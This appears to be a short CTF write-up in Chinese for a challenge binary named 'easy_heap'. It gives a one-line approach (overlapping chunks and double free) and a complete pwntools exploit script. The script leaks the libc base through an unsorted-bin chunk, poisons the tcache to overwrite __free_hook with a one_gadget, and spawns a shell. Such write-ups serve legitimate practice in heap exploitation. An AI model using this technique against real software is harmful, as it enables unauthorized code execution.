思路

overlap合并和doublefree
主要是練習(xí)一下堆布局

EXP

from pwn import *
context.log_level = 'debug'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process('easy_heap')
elf = ELF('easy_heap')
libc = elf.libc


def cmd(choice):
    sla('which command?\n> ',choice)

def add(size,content):
    cmd(1)
    sla('size \n> ',size)
    p.sendlineafter('content \n> ',content)

def show(idx):
    cmd(3)
    sla('index \n> ',idx)

def delete(idx):
    cmd(2)
    sla('index \n> ',idx)

def dbg():
    gdb.attach(p)
    pause()

for i in range(0,10):
    add(0x10,'a')
for i in range(0,6):
    delete(i)
delete(9)# protect

delete(6)#unsortbin
delete(7)
delete(8)


for i in range(0,7):
    add(0x10,'a')
add(0x10,'a')
add(0x10,'a')
add(0x10,'a')# make prevsize
#=================================================
for i in range(0,6):
    delete(i)

delete(8)
delete(7)
add(0xf8,'a')
delete(6)
delete(9)

for i in range(0,7):
    add(0x10,'a')
add(0x10,'a')
show(0)
libc_base = uu64()-96-0x3EBC40
lg('libc_base',libc_base)#leak 
#==================================================

add(0x10,'a')#0->9
delete(1)
delete(2)
delete(0)
delete(9)
add(0x10,p64(libc.sym['__free_hook']+libc_base))
add(0x10,'a')
one = libc_base + 0x4f322
add(0x10,p64(one))
delete(3)
# dbg()
# libc_base = uu64()-88
# lg('libc_base',libc_base)
p.interactive()